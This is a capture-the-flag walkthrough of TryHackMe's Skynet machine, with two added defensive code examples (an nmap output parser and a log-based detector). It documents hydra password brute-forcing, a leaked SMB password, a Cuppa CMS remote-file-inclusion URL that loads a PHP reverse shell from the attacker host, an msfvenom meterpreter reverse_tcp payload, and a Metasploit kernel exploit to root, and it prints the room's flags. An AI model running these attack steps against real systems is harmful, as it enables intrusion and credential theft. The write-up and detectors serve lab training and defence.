Skynet [TryHackMe]
2023-09-02
Introduction
I am facing the first “Offensive Pentesting” machine that gives no hints about what to do next. It is an easy-level machine, so it should not be too complicated even without the recommendations the previous rooms provided. The goal is to gain access to the machine and obtain the user flag and the root flag.
Task 1 - Deploy and compromise the vulnerable machine!
Step 1
- I start the machine and open the web application it hosts.
- I scan the machine with nmap in two steps: a fast SYN scan of all ports, then a script and version scan of only the ports found open.
sudo nmap -sS --min-rate 5000 -p- -Pn -v -oN nmap_inicial <IP>
ports=$(cat nmap_inicial | grep '^[0-9]' | cut -d '/' -f1 | xargs | tr ' ' ',')
sudo nmap -p$ports -sC -sV -Pn -oN nmap_final <IP>
- Open ports for SSH, an Apache web server, mail servers (POP3 and IMAP) and Samba. The operating system is Ubuntu Linux.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE PIPELINING SASL CAPA UIDL TOP RESP-CODES
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: more LOGIN-REFERRALS post-login LITERAL+ have Pre-login capabilities IDLE LOGINDISABLEDA0001 IMAP4rev1 SASL-IR listed ENABLE OK ID
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
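The second scan above takes its port list from the first one through a `grep '^[0-9]' | cut -d '/' -f1` pipeline. As an added example (not part of the original write-up), here is the same extraction done as a small parser of nmap's `-oN` format. It goes a little further than the shell pipeline: it keeps only rows whose state is `open`, so the closed or filtered rows that nmap prints when few ports are hidden do not leak into the second scan, and it lets the caller pick tcp or udp explicitly. The sample output, its version banner and the filtered/closed rows are constructed, not taken from the target.

```python
import re

# One "PORT STATE SERVICE" row of nmap -oN output, e.g.
#   22/tcp    open     ssh
NMAP_PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
)


def parse_ports(normal_output):
    """Yield (port, proto, state, service) for every port row in -oN text."""
    for line in normal_output.splitlines():
        m = NMAP_PORT_RE.match(line)
        if m:
            yield int(m["port"]), m["proto"], m["state"], m["service"]


def open_ports(normal_output, proto="tcp"):
    """Open ports only. The grep '^[0-9]' pipeline would also pick up the
    closed/filtered rows nmap prints when it cannot fold them into a
    'Not shown' line, and cut on '/' silently mixes tcp and udp rows."""
    return sorted(
        {p for p, pr, st, _ in parse_ports(normal_output)
         if pr == proto and st == "open"}
    )


def port_arg(normal_output, proto="tcp"):
    """Comma-separated list suitable for nmap -p<list>."""
    return ",".join(str(p) for p in open_ports(normal_output, proto))


# Constructed -oN excerpt (same services as the room, plus one filtered and
# one closed row to show that they are dropped). Not real scan output.
SAMPLE_OUTPUT = """\
# Nmap 7.94 scan initiated Sat Sep  2 11:50:00 2023 as: nmap -sS --min-rate 5000 -p- -Pn -v -oN nmap_inicial 10.10.126.64
Nmap scan report for 10.10.126.64
Host is up (0.05s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
110/tcp   open     pop3
139/tcp   open     netbios-ssn
143/tcp   open     imap
445/tcp   open     microsoft-ds
8080/tcp  filtered http-proxy
3306/tcp  closed   mysql
# Nmap done at Sat Sep  2 11:51:00 2023 -- 1 IP address (1 host up) scanned in 60.00 seconds
"""

if __name__ == "__main__":
    print(port_arg(SAMPLE_OUTPUT))  # 22,80,110,139,143,445
```

Used in place of the `ports=$(...)` line, the result is passed straight to `nmap -p$ports -sC -sV`, and a scan that shows filtered ports no longer triggers version probes against ports that never answered.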
Step 2
- I enumerate Samba with enum4linux and save the output to a file.
enum4linux -a 10.10.126.64 > samba_details
- I review the results.
===================================( OS information on 10.10.126.64 )===================================

[E] Can't get OS info with smbclient

[+] Got OS info for 10.10.126.64 from srvinfo:
SKYNET Wk Sv PrQ Unx NT SNT skynet server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03

=======================================( Users on 10.10.126.64 )=======================================

index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:

user:[milesdyson] rid:[0x3e8]

=================================( Share Enumeration on 10.10.126.64 )=================================

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP SKYNET
- I access the anonymous share with smbclient.
❯ smbclient //10.10.126.64/anonymous
Password for [WORKGROUP\k3ss]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 17:04:00 2020
.. D 0 Tue Sep 17 09:20:17 2019
attention.txt N 163 Wed Sep 18 05:04:59 2019
logs D 0 Wed Sep 18 06:42:16 2019
9204224 blocks of size 1024. 5831500 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (1,0 KiloBytes/sec) (average 1,0 KiloBytes/sec)
NT_STATUS_OBJECT_NAME_INVALID opening remote file \logs\*
smb: \> get logs\log
logs\log1.txt logs\log2.txt logs\log3.txt
smb: \> get logs\log1.txt
getting file \logs\log1.txt of size 471 as logs\log1.txt (3,1 KiloBytes/sec) (average 2,1 KiloBytes/sec)
smb: \> get logs\log2.txt
getting file \logs\log2.txt of size 0 as logs\log2.txt (0,0 KiloBytes/sec) (average 1,5 KiloBytes/sec)
smb: \> get logs\log3.txt
getting file \logs\log3.txt of size 0 as logs\log3.txt (0,0 KiloBytes/sec) (average 1,2 KiloBytes/sec)
Step 3
- I enumerate the directories on the web server with dirb.
❯ dirb http://10.10.126.64/ /usr/share/wordlists/dirb/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Sep 2 11:57:08 2023
URL_BASE: http://10.10.126.64/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.126.64/ ----
==> DIRECTORY: http://10.10.126.64/admin/
==> DIRECTORY: http://10.10.126.64/config/
==> DIRECTORY: http://10.10.126.64/css/
+ http://10.10.126.64/index.html (CODE:200|SIZE:523)
==> DIRECTORY: http://10.10.126.64/js/
+ http://10.10.126.64/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.126.64/squirrelmail/
- squirrelmail has a login page; I save the POST request to a file.
POST /squirrelmail/src/redirect.php HTTP/1.1
Host: 10.10.126.64
Content-Length: 81
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.126.64
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.126.64/squirrelmail/src/login.php
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Cookie: SQMSESSID=tn1nf3uvf4cm77sboeo2ssshg0
Connection: close
login_username=mylesdyson&secretkey=test&js_autodetect_results=1&just_logged_in=1
- I use Burp Intruder and also hydra to try all the passwords from log1.txt (either method works).
❯ hydra -l milesdyson -P /home/k3ss/Documentos/tryhackme/skynet/nmap/log1.txt 10.10.126.64 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Login failed" -V -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-02 12:27:55
[DATA] max 4 tasks per 1 server, overall 4 tasks, 31 login tries (l:1/p:31), ~8 tries per task
[DATA] attacking http-post-form://10.10.126.64:80/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Login failed
[ATTEMPT] target 10.10.126.64 - login "milesdyson" - pass "cyborg007haloterminator" - 1 of 31 [child 0] (0/0)
[ATTEMPT] target 10.10.126.64 - login "milesdyson" - pass "terminator22596" - 2 of 31 [child 1] (0/0)
[ATTEMPT] target 10.10.126.64 - login "milesdyson" - pass "terminator219" - 3 of 31 [child 2] (0/0)
[ATTEMPT] target 10.10.126.64 - login "milesdyson" - pass "terminator20" - 4 of 31 [child 3] (0/0)
[80][http-post-form] host: 10.10.126.64 login: milesdyson password: cyborg007haloterminator
[80][http-post-form] host: 10.10.126.64 login: milesdyson password: terminator22596
[80][http-post-form] host: 10.10.126.64 login: milesdyson password: terminator219
[80][http-post-form] host: 10.10.126.64 login: milesdyson password: terminator20
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-02 12:27:55
- I check the mailbox and find that the SMB password has been changed.
Subject: Samba Password reset
From: skynet@skynet
Date: Tue, September 17, 2019 10:10 pm
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
- I connect with smbclient and download everything.
❯ smbclient //10.10.126.64/milesdyson -U milesdyson -c "recurse; mget *"
- I review the files and find one called important.txt.
❯ cat important.txt
File: important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
- I open the CMS at http://10.10.126.64/45kra24zxs28v3yd/
- I scan the URL with dirb and find that it hosts Cuppa CMS.
❯ dirb http://10.10.126.64/45kra24zxs28v3yd /usr/share/wordlists/dirb/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Sep 2 12:48:28 2023
URL_BASE: http://10.10.126.64/45kra24zxs28v3yd/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.126.64/45kra24zxs28v3yd/ ----
==> DIRECTORY: http://10.10.126.64/45kra24zxs28v3yd/administrator/
Step 4
- I search for known exploits.
❯ searchsploit cuppa -w
-------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Exploit Title | URL
-------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | https://www.exploit-db.com/exploits/25971
-------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results
- This vulnerability allows including local or remote PHP files, or reading files that are not PHP. I look for a PHP reverse shell to use with it.
❯ find /usr/share -iname "php-reverse-shell.php" 2>/dev/null
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php
- After starting a listener, I use the exploit to load the PHP file on the target.
http://10.10.126.64/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.x.x.x/php-reverse-shell.php
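The password guessing against the SquirrelMail login in Step 3 and the remote file inclusion through alertConfigField.php in Step 4 both leave a distinctive trail in the web server's access log. The following is an added example, not part of the original write-up and not code from SquirrelMail or Cuppa CMS, showing how a defender would pick both out of Apache log lines: a burst of POSTs to the login handlers from a single source (what the hydra run looks like from the server side), and a request whose `urlConfig` parameter carries a remote URL. The log lines, source addresses, the threshold of 10 attempts and the 60-second window are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Apache common/combined log prefix: client ident user [timestamp] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Endpoints this room touches: the SquirrelMail login handlers (hydra posted to
# login.php, the browser form posts to redirect.php) and the Cuppa CMS include.
LOGIN_PATHS = {"/squirrelmail/src/login.php", "/squirrelmail/src/redirect.php"}
RFI_SCRIPT = "alertConfigField.php"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FMT)
    return entry


def detect_login_bursts(entries, threshold=10, window=timedelta(seconds=60)):
    """Map source IP -> largest number of login POSTs seen inside any sliding
    window of length `window`, for sources that reach `threshold`."""
    per_ip = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and urlsplit(e["path"]).path in LOGIN_PATHS:
            per_ip[e["ip"]].append(e["ts"])
    hits = {}
    for ip, times in per_ip.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = best
    return hits


def detect_rfi(entries):
    """List (ip, urlConfig) for requests to alertConfigField.php whose
    urlConfig parameter is a remote http(s) URL."""
    found = []
    for e in entries:
        parts = urlsplit(e["path"])
        if not parts.path.endswith("/" + RFI_SCRIPT):
            continue
        for value in parse_qs(parts.query).get("urlConfig", []):  # already %-decoded
            if value.lower().startswith(("http://", "https://")):
                found.append((e["ip"], value))
    return found


def analyze(lines):
    """Run both detectors over raw log lines, skipping lines that do not parse."""
    entries = [e for e in map(parse_line, lines) if e]
    return detect_login_bursts(entries), detect_rfi(entries)


# Constructed sample log (not from the target): a 12-request burst from one
# source, one ordinary login, one index fetch, one unparseable line and one
# include request carrying a remote URL.
_BURST = [
    f'10.0.0.5 - - [02/Sep/2023:12:27:{s:02d} +0200] '
    '"POST /squirrelmail/src/login.php HTTP/1.1" 200 1942'
    for s in range(40, 52)
]
SAMPLE_LOG = _BURST + [
    '10.0.0.9 - - [02/Sep/2023:12:30:01 +0200] "GET /index.html HTTP/1.1" 200 523',
    '10.0.0.9 - - [02/Sep/2023:12:30:09 +0200] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 -',
    'garbage line that does not parse',
    '10.0.0.5 - - [02/Sep/2023:12:48:30 +0200] '
    '"GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php'
    '?urlConfig=http%3A%2F%2F10.0.0.5%2Fphp-reverse-shell.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    bursts, rfi = analyze(SAMPLE_LOG)
    print("login bursts:", bursts)  # {'10.0.0.5': 12}
    print("rfi attempts:", rfi)     # [('10.0.0.5', 'http://10.0.0.5/php-reverse-shell.php')]
```

Matching on the parameter rather than on the response code is deliberate: with `allow_url_include` disabled in php.ini the remote include fails, but the request still lands in the log and is still worth an alert.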
Step 5
- Reverse shell connection.
❯ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.126.64] 43474
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
06:02:14 up 2:06, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
- I stabilize the shell and look for the user flag.
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@skynet:/$ cd
cd
bash: cd: HOME not set
www-data@skynet:/$ ls
ls
bin home lib64 opt sbin tmp vmlinuz.old
boot initrd.img lost+found proc snap usr
dev initrd.img.old media root srv var
etc lib mnt run sys vmlinuz
www-data@skynet:/$ cd home
cd home
www-data@skynet:/home$ ls
ls
milesdyson
www-data@skynet:/home$ cd milesdyson
cd milesdyson
www-data@skynet:/home/milesdyson$ ls
ls
backups mail share user.txt
www-data@skynet:/home/milesdyson$ cat user.txt
cat user.txt
7ce5c2109a40f958099283600a9ae807
Step 6
- I create a payload with msfvenom to get meterpreter access and upload it to the target with wget.
❯ msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.x.x.x LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: shell
- In Metasploit I run:
msf6 > use linux/x64/meterpreter/reverse_tcp
msf6 payload(linux/x64/meterpreter/reverse_tcp) > set LHOST tun0
msf6 payload(linux/x64/meterpreter/reverse_tcp) > exploit
[*] Payload Handler Started as Job 0
msf6 payload(linux/x64/meterpreter/reverse_tcp) >
[*] Started reverse TCP handler on 10.x.x.x:4444
[*] Sending stage (3045380 bytes) to 10.10.126.64
[*] Meterpreter session 1 opened (10.x.x.x:4444 -> 10.10.126.64:33592) at 2023-09-02 13:27:55 +0200
meterpreter > sysinfo
Computer : 10.10.126.64
OS : Ubuntu 16.04 (Linux 4.8.0-58-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
- I run Metasploit's local exploit suggester.
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.126.64 - Collecting local exploits for x64/linux...
[*] 10.10.126.64 - 186 exploit checks are being tried...
[+] 10.10.126.64 - exploit/linux/local/bpf_sign_extension_priv_esc: The target appears to be vulnerable.
[+] 10.10.126.64 - exploit/linux/local/cve_2021_3493_overlayfs: The target appears to be vulnerable.
[+] 10.10.126.64 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 10.10.126.64 - exploit/linux/local/cve_2022_0995_watch_queue: The target appears to be vulnerable.
[+] 10.10.126.64 - exploit/linux/local/glibc_realpath_priv_esc: The target appears to be vulnerable.
[+] 10.10.126.64 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 10.10.126.64 - exploit/linux/local/ptrace_traceme_pkexec_helper: The target appears to be vulnerable.
[+] 10.10.126.64 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.10.126.64 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.16 is a vulnerable build.
[+] 10.10.126.64 - exploit/linux/local/ufo_privilege_escalation: The target appears to be vulnerable.
[*] Running check method for exploit 63 / 63
[*] 10.10.126.64 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/bpf_sign_extension_priv_esc Yes The target appears to be vulnerable.
2 exploit/linux/local/cve_2021_3493_overlayfs Yes The target appears to be vulnerable.
3 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
4 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.
5 exploit/linux/local/glibc_realpath_priv_esc Yes The target appears to be vulnerable.
6 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
7 exploit/linux/local/ptrace_traceme_pkexec_helper Yes The target appears to be vulnerable.
8 exploit/linux/local/su_login Yes The target appears to be vulnerable.
9 exploit/linux/local/sudo_baron_samedit Yes The target appears to be vulnerable. sudo 1.8.16 is a vulnerable build.
10 exploit/linux/local/ufo_privilege_escalation Yes The target appears to be vulnerable.
- I use the exploit
exploit/linux/local/bpf_sign_extension_priv_esc
https://www.rapid7.com/db/modules/exploit/linux/local/bpf_sign_extension_priv_esc/
msf6 payload(linux/x64/meterpreter/reverse_tcp) > use exploit/linux/local/bpf_sign_extension_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set LHOST tun0
LHOST => tun0
Module options (exploit/linux/local/bpf_sign_extension_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
SESSION yes The session to run this module on
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > run
[-] Handler failed to bind to 10.x.x.x4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.UoAQEHbf' (250 bytes) ...
[*] Launching exploit ...
[*] Sending stage (3045380 bytes) to 10.10.126.64
[*] Cleaning up /tmp/.UoAQEHbf and /tmp/.cVeXOTD6D ...
[*] Meterpreter session 2 opened (10.x.x.x:4444 -> 10.10.126.64:33600) at 2023-09-02 13:36:02 +0200
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > sessions 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: root
- Once I have root access, I look for the flag.
meterpreter > cd /root
meterpreter > ls
Listing: /root
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
020666/rw-rw-rw- 0 cha 2023-09-02 10:55:49 +0200 .bash_history
100644/rw-r--r-- 3106 fil 2015-10-22 19:15:21 +0200 .bashrc
040700/rwx------ 4096 dir 2019-09-18 00:35:40 +0200 .cache
040755/rwxr-xr-x 4096 dir 2019-09-17 09:32:06 +0200 .nano
100644/rw-r--r-- 148 fil 2015-08-17 17:30:33 +0200 .profile
100644/rw-r--r-- 33 fil 2019-09-18 05:41:47 +0200 root.txt
meterpreter > cat root.txt
3f0372db24753accc7179a282cd6a949
Conclusion
Without the kind of guide the previous rooms had, I had to research a bit more than usual. Even so, the machine is fairly simple and I had no trouble solving it. It follows the same pattern as the other TryHackMe machines: enumeration, exploitation and privilege escalation. With a little patience and motivation it can be solved without problems. The tools I used are the usual ones: nmap, enum4linux, dirb, Burp, Metasploit, hydra, smbclient, msfvenom, etc. A very recommendable and entertaining machine with a Terminator theme.